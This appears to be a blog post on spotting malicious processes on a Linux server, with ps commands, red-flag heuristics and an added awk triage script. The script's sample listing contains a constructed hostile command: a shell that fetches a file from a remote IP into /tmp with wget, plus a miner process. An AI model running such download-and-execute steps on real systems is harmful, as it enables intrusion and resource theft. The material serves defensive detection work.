
How I Spot a Suspicious Process on My Linux Server (Before It Does Damage)

2 min read · Jun 6, 2025

One strange PID.
One weird name.
That’s all it takes for a compromise to start — silently.

Over the years, I’ve learned to read a process list like a detective. In this blog, I’ll share exactly what I look for when I suspect a Linux server is misbehaving — and how you can spot malicious processes before they take control.

🧠 Step 1: Always Check With ps, Not Just top

Why? Because top refreshes live and can miss fast-spawning processes.

ps aux --sort=-%cpu | head
ps -eo pid,ppid,cmd,%mem,%cpu --sort=-%mem | head

✅ What I look for:

  • bash or sh running under unusual users
  • Commands like curl, wget, python inside a shell
  • Anything running from /tmp or /dev/shm

🧪 Step 2: Look for Process Names That Try to Blend In

Attackers love hiding in plain sight.
They’ll name things like:

  • [kworker/0:1]
  • sshd (but fake)
  • cron (but not started by root)
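Putting Steps 1 and 2 into one triage script, as an added example that is not part of the original post: it parses a `ps -eo pid,ppid,user,args` listing and prints only the rows matching the red flags above. Assumptions (mine, not the author's): real kernel threads are children of kthreadd (PPID 2), cron and sshd normally run as root, and the listing below is constructed, not from a real host.

```shell
#!/bin/sh
# Triage a `ps -eo pid,ppid,user,args` listing and print the rows that match the
# red flags above. Heuristics, not proof: they assume real kernel threads are
# children of kthreadd (PPID 2) and that cron/sshd normally run as root.
flag_suspicious() {
  awk '
    NR == 1 { next }                                  # header row
    {
      pid = $1; ppid = $2; user = $3
      args = $4; for (i = 5; i <= NF; i++) args = args " " $i
      name = $4; base = name; sub(/.*\//, "", base)   # argv[0] and its basename
      why = ""
      # 1. anything executed from world-writable scratch directories
      if (args ~ /(^|[ =])\/(tmp|dev\/shm)\//) why = why "runs-from-tmp;"
      # 2. bracketed "kernel thread" name whose parent is not kthreadd
      if (name ~ /^\[.*\]$/ && ppid != 2 && pid != 2) why = why "fake-kernel-thread;"
      # 3. cron or sshd owned by a non-root user
      if ((base == "cron" || base == "crond" || base == "sshd") && user != "root")
        why = why "daemon-not-root;"
      # 4. a shell whose command line pulls in a downloader or interpreter
      if (base ~ /^(ba|da|z)?sh$/ && args ~ /(curl|wget|python[0-9.]*)( |$)/)
        why = why "shell-runs-downloader;"
      if (why != "") printf "%s pid=%s ppid=%s user=%s cmd=%s\n", why, pid, ppid, user, args
    }'
}

# Constructed sample listing (not captured from a real host) so the script runs offline.
SAMPLE='  PID  PPID USER     COMMAND
    1     0 root     /sbin/init
    2     0 root     [kthreadd]
   15     2 root     [kworker/0:1]
  812     1 root     /usr/sbin/cron -f
  900     1 root     /usr/sbin/sshd -D
 4310  4301 www-data /bin/sh -c wget -q -O /tmp/.x http://198.51.100.7/x
 4322  4310 www-data /tmp/.x/miner --cpu
 4400     1 nobody   [kworker/0:1]
 4500     1 daemon   cron -f'

printf '%s\n' "$SAMPLE" | flag_suspicious
```

On a live host, replace the sample with `ps -eo pid,ppid,user,args | flag_suspicious`; a hit on a bracketed name is then confirmed with `ls -l /proc/PID/exe`, which is empty for a real kernel thread.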

Written by Faruk Ahmed

With 10+ years as an InfoSec Analyst, I excel in Symantec DLP, CrowdStrike, QRadar, Qualys, FireEye, Red Hat Linux, WebLogic, Python, and Bash. I am passionate.